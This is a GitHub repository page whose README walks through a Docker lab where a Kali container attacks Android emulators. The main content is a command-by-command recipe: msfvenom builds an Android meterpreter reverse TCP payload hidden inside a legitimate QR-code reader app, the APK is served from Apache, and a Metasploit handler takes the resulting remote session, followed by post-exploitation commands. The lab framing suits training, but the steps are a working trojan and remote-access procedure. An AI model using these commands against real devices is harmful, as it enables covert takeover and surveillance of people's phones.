Skip to content

Boing740/Android

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
ANDROID EXPLOIT.pptx
ANDROID EXPLOIT.pptx
 
 
Dockerfile-kali
Dockerfile-kali
 
 
README.md
README.md
 
 
docker-compose.yml
docker-compose.yml
 
 

Repository files navigation

androidExploitwithMetasploit

This project aims to simulate an attack scenario against Android devices. Using docker compose file you can simulate a subnet with android device and kali machine inside

Requirements

  1. Docker and docker-compose are installed in your system. Check installation here: https://www.docker.com/
  2. This project use a docker image for android device. Check the documentation here: https://github.com/budtmo/docker-android
  3. Before you start check if your machine support virtualization:
sudo apt install cpu-checker
kvm-ok

Quick start

  1. Download Dockerfile and docker-compose.yml from this repository
  2. Go inside the directory containing files.
  3. Open terminal and run:
docker-compose up
  1. Open the browser and check http://localhost:6080 to see android device S10 running.
  2. Open the browser and check http://localhost:6081 to see android device S8 running.
  3. Open terminal and run:
docker exec -it kali bash
  1. Now you can interact with kali linux and metasploit-framework
  2. Run nmap checking network devices info into the network
nmap -O 172.16.238.0/24

Attack scenario

Create malicious apk

  1. Create .apk android meterpreter reverse tcp payload with msfvenom command.
  2. Inject malware.apk into QRcodeReader.apk (legitimate app) with -x option.
  3. Set LHOST=172.16.238.10 and LPORT=4444. Then save .apk file with -o option:
 msfvenom -p android/meterpreter/reverse_tcp -x app/QRcodeReader.apk LHOST=172.16.238.10 LPORT=4444 -o malware.apk
  1. Move generated malware.apk into apache server directory /var/www/html with this command:
mv malware.apk /var/www/html
  1. Run apache2 server:
service apache2 start

Configure metasploit listener

  1. Go on kali and run metasploit-framework:
msfconsole
  1. Set generic handler:
use multi/handler
  1. Set payload type:
set PAYLOAD android/meterpreter/reverse_tcp
  1. Set LHOST:
set LHOST 172.16.238.10
  1. Set LPORT:
set LPORT 4444
  1. Run exploit:
exploit
  1. Well done! Now you can wait victim install the apk file.

On Android Device

  1. On android devices open browser, type 172.16.238.10/malware.apk and download the app.
  2. Install malware.apk enabling unknown sources from setting menu. Open the app!

Post exploit

  1. On kali machine you can see new session opened and use meterpreter console. Run help to see all allowed commands
help
  1. Run app_list to show all app installed on victim device:
app_list

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors